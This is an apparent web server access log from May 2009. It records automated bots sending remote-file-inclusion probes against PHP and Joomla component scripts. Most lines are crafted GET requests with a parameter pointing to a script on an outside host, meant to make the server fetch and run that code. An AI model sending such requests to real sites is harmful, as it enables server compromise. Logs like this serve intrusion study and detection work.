173.15.28.165 - - [27/May/2009:21:28:18 -0500] "GET /logs//index.php?themesdir=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
173.15.28.165 - - [27/May/2009:21:28:18 -0500] "GET //index.php?themesdir=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.147.30.80 - - [27/May/2009:21:28:19 -0500] "GET /logs//index.php?themesdir=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
217.147.30.80 - - [27/May/2009:21:28:19 -0500] "GET //index.php?themesdir=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
80.237.146.58 - - [27/May/2009:21:28:26 -0500] "GET /logs//index.php?themesdir=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.76"
80.237.146.58 - - [27/May/2009:21:28:27 -0500] "GET //index.php?themesdir=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.76"
218.38.16.54 - - [27/May/2009:21:30:09 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
200.201.25.7 - - [27/May/2009:21:30:43 -0500] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
200.201.25.7 - - [27/May/2009:21:30:43 -0500] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
173.15.28.165 - - [27/May/2009:21:30:57 -0500] "GET //index.php?themesdir=http://www.laurent-camping-cars.com//administrator/components/drivid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
173.15.28.165 - - [27/May/2009:21:30:57 -0500] "GET /logs//index.php?themesdir=http://www.laurent-camping-cars.com//administrator/components/drivid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
202.70.83.4 - - [27/May/2009:21:31:00 -0500] "GET /logs//index.php?themesdir=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
202.70.83.4 - - [27/May/2009:21:31:01 -0500] "GET //index.php?themesdir=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
210.100.220.126 - - [27/May/2009:21:31:36 -0500] "GET /logs/access_log.1242086400//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tdaa.by.ru/safe.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.65"
210.100.220.126 - - [27/May/2009:21:31:36 -0500] "GET /logs/access_log.1242432000//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tdaa.by.ru/safe.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.65"
210.100.220.126 - - [27/May/2009:21:31:36 -0500] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tdaa.by.ru/safe.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.65"
210.100.220.126 - - [27/May/2009:21:31:36 -0500] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tdaa.by.ru/safe.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
65.98.80.2 - - [27/May/2009:21:33:23 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.98.80.2 - - [27/May/2009:21:33:23 -0500] "GET /errors.php?error=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
65.98.80.2 - - [27/May/2009:21:33:23 -0500] "GET /logs/errors.php?error=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
65.55.208.143 - - [27/May/2009:21:33:31 -0500] "GET /logs/access_log.1238630400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.98.80.2 - - [27/May/2009:21:33:33 -0500] "GET /errors.php?error=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
65.98.80.2 - - [27/May/2009:21:33:33 -0500] "GET /logs/errors.php?error=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
65.98.80.2 - - [27/May/2009:21:33:33 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.208.111.178 - - [27/May/2009:21:38:16 -0500] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
74.208.111.178 - - [27/May/2009:21:38:16 -0500] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
38.99.44.102 - - [27/May/2009:21:38:32 -0500] "GET /logs/access_log.1240012800 HTTP/1.0" 200 331722 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.139.134.211 - - [27/May/2009:21:39:04 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
67.139.134.211 - - [27/May/2009:21:39:04 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
74.208.64.7 - - [27/May/2009:21:39:09 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
74.208.64.7 - - [27/May/2009:21:39:09 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
72.52.230.102 - - [27/May/2009:21:39:15 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
72.52.230.102 - - [27/May/2009:21:39:16 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
173.15.28.165 - - [27/May/2009:21:39:18 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
173.15.28.165 - - [27/May/2009:21:39:18 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
216.193.210.232 - - [27/May/2009:21:39:19 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.814"
216.193.210.232 - - [27/May/2009:21:39:19 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.814"
74.208.64.7 - - [27/May/2009:21:39:50 -0500] "GET /logs/prog/pl_menu/show_menu.php?binn_include_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
74.208.64.7 - - [27/May/2009:21:39:50 -0500] "GET /prog/pl_menu/show_menu.php?binn_include_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
67.139.134.211 - - [27/May/2009:21:39:51 -0500] "GET /logs/prog/pl_menu/show_menu.php?binn_include_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
67.139.134.211 - - [27/May/2009:21:39:51 -0500] "GET /prog/pl_menu/show_menu.php?binn_include_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
72.52.230.102 - - [27/May/2009:21:39:52 -0500] "GET /logs/prog/pl_menu/show_menu.php?binn_include_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
72.52.230.102 - - [27/May/2009:21:39:52 -0500] "GET /prog/pl_menu/show_menu.php?binn_include_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
173.15.28.165 - - [27/May/2009:21:39:52 -0500] "GET /logs/prog/pl_menu/show_menu.php?binn_include_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
173.15.28.165 - - [27/May/2009:21:39:53 -0500] "GET /prog/pl_menu/show_menu.php?binn_include_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
217.147.30.80 - - [27/May/2009:21:39:55 -0500] "GET /logs/prog/pl_menu/show_menu.php?binn_include_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
217.147.30.80 - - [27/May/2009:21:39:56 -0500] "GET /prog/pl_menu/show_menu.php?binn_include_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
65.55.106.214 - - [27/May/2009:21:40:09 -0500] "GET /logs/access_log.1231113600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.194 - - [27/May/2009:21:40:09 -0500] "GET /logs/access_log.1146700800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.18.203 - - [27/May/2009:21:40:21 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.808"
91.121.18.203 - - [27/May/2009:21:40:22 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.808"
65.55.106.237 - - [27/May/2009:21:40:38 -0500] "GET /logs/access_log.1216684800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
210.109.102.96 - - [27/May/2009:21:40:40 -0500] "GET //administrator/components/com_jreactions/langset.php?comPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
210.109.102.96 - - [27/May/2009:21:40:40 -0500] "GET /logs//administrator/components/com_jreactions/langset.php?comPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
210.109.102.96 - - [27/May/2009:21:40:40 -0500] "GET /logs/access_log.1241654400//administrator/components/com_jreactions/langset.php?comPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
80.237.146.58 - - [27/May/2009:21:40:47 -0500] "GET /logs/prog/pl_menu/show_menu.php?binn_include_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.76"
80.237.146.58 - - [27/May/2009:21:40:48 -0500] "GET /prog/pl_menu/show_menu.php?binn_include_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.76"
173.15.28.165 - - [27/May/2009:21:40:55 -0500] "GET /logs/prog/pl_menu/show_menu.php?binn_include_path=http://www.laurent-camping-cars.com//administrator/components/drivid.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
210.109.102.96 - - [27/May/2009:21:40:55 -0500] "GET /logs/access_log.1241740800//administrator/components/com_jreactions/langset.php?comPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
80.237.146.58 - - [27/May/2009:21:40:57 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.76"
80.237.146.58 - - [27/May/2009:21:40:58 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.76"
216.193.210.232 - - [27/May/2009:21:41:01 -0500] "GET /logs/prog/pl_menu/show_menu.php?binn_include_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.814"
216.193.210.232 - - [27/May/2009:21:41:01 -0500] "GET /prog/pl_menu/show_menu.php?binn_include_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.814"
173.15.28.165 - - [27/May/2009:21:41:06 -0500] "GET /prog/pl_menu/show_menu.php?binn_include_path=http://www.laurent-camping-cars.com//administrator/components/drivid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
217.147.30.80 - - [27/May/2009:21:41:19 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
217.147.30.80 - - [27/May/2009:21:41:19 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
200.111.68.26 - - [27/May/2009:21:41:29 -0500] "GET /?_zb_path=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.820"
202.70.83.4 - - [27/May/2009:21:41:46 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
202.70.83.4 - - [27/May/2009:21:41:47 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
202.70.83.4 - - [27/May/2009:21:41:49 -0500] "GET /logs/prog/pl_menu/show_menu.php?binn_include_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
202.70.83.4 - - [27/May/2009:21:41:50 -0500] "GET /prog/pl_menu/show_menu.php?binn_include_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
200.111.68.26 - - [27/May/2009:21:41:54 -0500] "GET /logs/?_zb_path=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 200 191095 "-""libwww-perl/5.820"
91.121.18.203 - - [27/May/2009:21:42:03 -0500] "GET /logs/prog/pl_menu/show_menu.php?binn_include_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
91.121.18.203 - - [27/May/2009:21:42:03 -0500] "GET /prog/pl_menu/show_menu.php?binn_include_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.808"
65.98.80.2 - - [27/May/2009:21:42:46 -0500] "GET /logs/access_log.1241136000/errors.php?error=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.98.80.2 - - [27/May/2009:21:43:09 -0500] "GET /logs/access_log.1241136000/errors.php?error=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.208.111.178 - - [27/May/2009:21:44:33 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
74.208.111.178 - - [27/May/2009:21:44:33 -0500] "GET //config/dbutil.bck.php?confdir=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
74.208.111.178 - - [27/May/2009:21:44:38 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
74.208.111.178 - - [27/May/2009:21:44:38 -0500] "GET //config/dbutil.bck.php?confdir=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
74.208.111.178 - - [27/May/2009:21:44:41 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
74.208.111.178 - - [27/May/2009:21:44:41 -0500] "GET //config/dbutil.bck.php?confdir=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
87.106.67.146 - - [27/May/2009:21:47:17 -0500] "GET /logs/errors.php?error=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
87.106.67.146 - - [27/May/2009:21:47:17 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
87.106.67.146 - - [27/May/2009:21:47:17 -0500] "GET /errors.php?error=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
116.36.213.166 - - [27/May/2009:21:47:30 -0500] "GET //administrator/components/com_jreactions/langset.php?comPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
116.36.213.166 - - [27/May/2009:21:47:30 -0500] "GET /logs//administrator/components/com_jreactions/langset.php?comPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
116.36.213.166 - - [27/May/2009:21:47:31 -0500] "GET /logs/access_log.1241654400//administrator/components/com_jreactions/langset.php?comPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
173.15.28.165 - - [27/May/2009:21:47:40 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.laurent-camping-cars.com//administrator/components/drivid.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
173.15.28.165 - - [27/May/2009:21:47:40 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.laurent-camping-cars.com//administrator/components/drivid.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
116.36.213.166 - - [27/May/2009:21:48:05 -0500] "GET /logs/access_log.1241740800//administrator/components/com_jreactions/langset.php?comPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
87.106.67.146 - - [27/May/2009:21:49:14 -0500] "GET /logs/access_log.1241136000/errors.php?error=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.249.36.194 - - [27/May/2009:21:49:30 -0500] "GET //include/admin.lib.inc.php?site_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
218.249.36.194 - - [27/May/2009:21:49:44 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.249.36.194 - - [27/May/2009:21:49:44 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.55.106.236 - - [27/May/2009:21:50:40 -0500] "GET /logs/access_log.1127520000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.249.36.194 - - [27/May/2009:21:54:34 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.249.36.194 - - [27/May/2009:21:54:34 -0500] "GET //include/admin.lib.inc.php?site_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
218.249.36.194 - - [27/May/2009:21:54:35 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.249.36.194 - - [27/May/2009:21:54:44 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.55.106.159 - - [27/May/2009:21:56:39 -0500] "GET /logs/access_log.1219968000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.139.134.211 - - [27/May/2009:22:02:29 -0500] "GET /logs//?sIncPath=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 200 191100 "-""libwww-perl/5.805"
67.139.134.211 - - [27/May/2009:22:02:29 -0500] "GET //?sIncPath=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
72.52.230.102 - - [27/May/2009:22:02:42 -0500] "GET /logs//?sIncPath=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 200 191100 "-""libwww-perl/5.810"
72.52.230.102 - - [27/May/2009:22:02:42 -0500] "GET //?sIncPath=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.810"
74.208.64.7 - - [27/May/2009:22:02:46 -0500] "GET /logs//?sIncPath=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 200 191100 "-""libwww-perl/5.805"
74.208.64.7 - - [27/May/2009:22:02:46 -0500] "GET //?sIncPath=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
173.15.28.165 - - [27/May/2009:22:02:53 -0500] "GET /logs//?sIncPath=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 200 191100 "-""libwww-perl/5.805"
173.15.28.165 - - [27/May/2009:22:02:53 -0500] "GET //?sIncPath=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
91.121.18.203 - - [27/May/2009:22:02:58 -0500] "GET /logs//?sIncPath=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 200 36689 "-""libwww-perl/5.808"
91.121.18.203 - - [27/May/2009:22:02:58 -0500] "GET //?sIncPath=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.808"
80.237.146.58 - - [27/May/2009:22:02:59 -0500] "GET /logs//?sIncPath=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 200 191100 "-""libwww-perl/5.76"
80.237.146.58 - - [27/May/2009:22:02:59 -0500] "GET //?sIncPath=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.76"
216.193.210.232 - - [27/May/2009:22:03:17 -0500] "GET /logs//?sIncPath=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 200 191100 "-""libwww-perl/5.814"
216.193.210.232 - - [27/May/2009:22:03:19 -0500] "GET //?sIncPath=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.814"
202.70.83.4 - - [27/May/2009:22:03:37 -0500] "GET //?sIncPath=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
202.70.83.4 - - [27/May/2009:22:03:39 -0500] "GET /logs//?sIncPath=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 200 57179 "-""libwww-perl/5.803"
216.193.210.232 - - [27/May/2009:22:05:02 -0500] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.814"
216.193.210.232 - - [27/May/2009:22:05:02 -0500] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.814"
72.52.230.102 - - [27/May/2009:22:05:07 -0500] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.810"
72.52.230.102 - - [27/May/2009:22:05:07 -0500] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
67.139.134.211 - - [27/May/2009:22:05:07 -0500] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
67.139.134.211 - - [27/May/2009:22:05:07 -0500] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
91.121.18.203 - - [27/May/2009:22:05:15 -0500] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.808"
91.121.18.203 - - [27/May/2009:22:05:16 -0500] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.808"
173.15.28.165 - - [27/May/2009:22:05:18 -0500] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
173.15.28.165 - - [27/May/2009:22:05:18 -0500] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
74.208.64.7 - - [27/May/2009:22:05:20 -0500] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
74.208.64.7 - - [27/May/2009:22:05:20 -0500] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
80.237.146.58 - - [27/May/2009:22:05:31 -0500] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.76"
80.237.146.58 - - [27/May/2009:22:05:31 -0500] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.76"
202.70.83.4 - - [27/May/2009:22:05:44 -0500] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
202.70.83.4 - - [27/May/2009:22:05:45 -0500] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.803"
173.15.28.165 - - [27/May/2009:22:06:42 -0500] "GET //?sIncPath=http://www.laurent-camping-cars.com//administrator/components/drivid.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
173.15.28.165 - - [27/May/2009:22:06:43 -0500] "GET /logs//?sIncPath=http://www.laurent-camping-cars.com//administrator/components/drivid.txt?? HTTP/1.1" 200 191100 "-""libwww-perl/5.805"
67.139.134.211 - - [27/May/2009:22:07:08 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
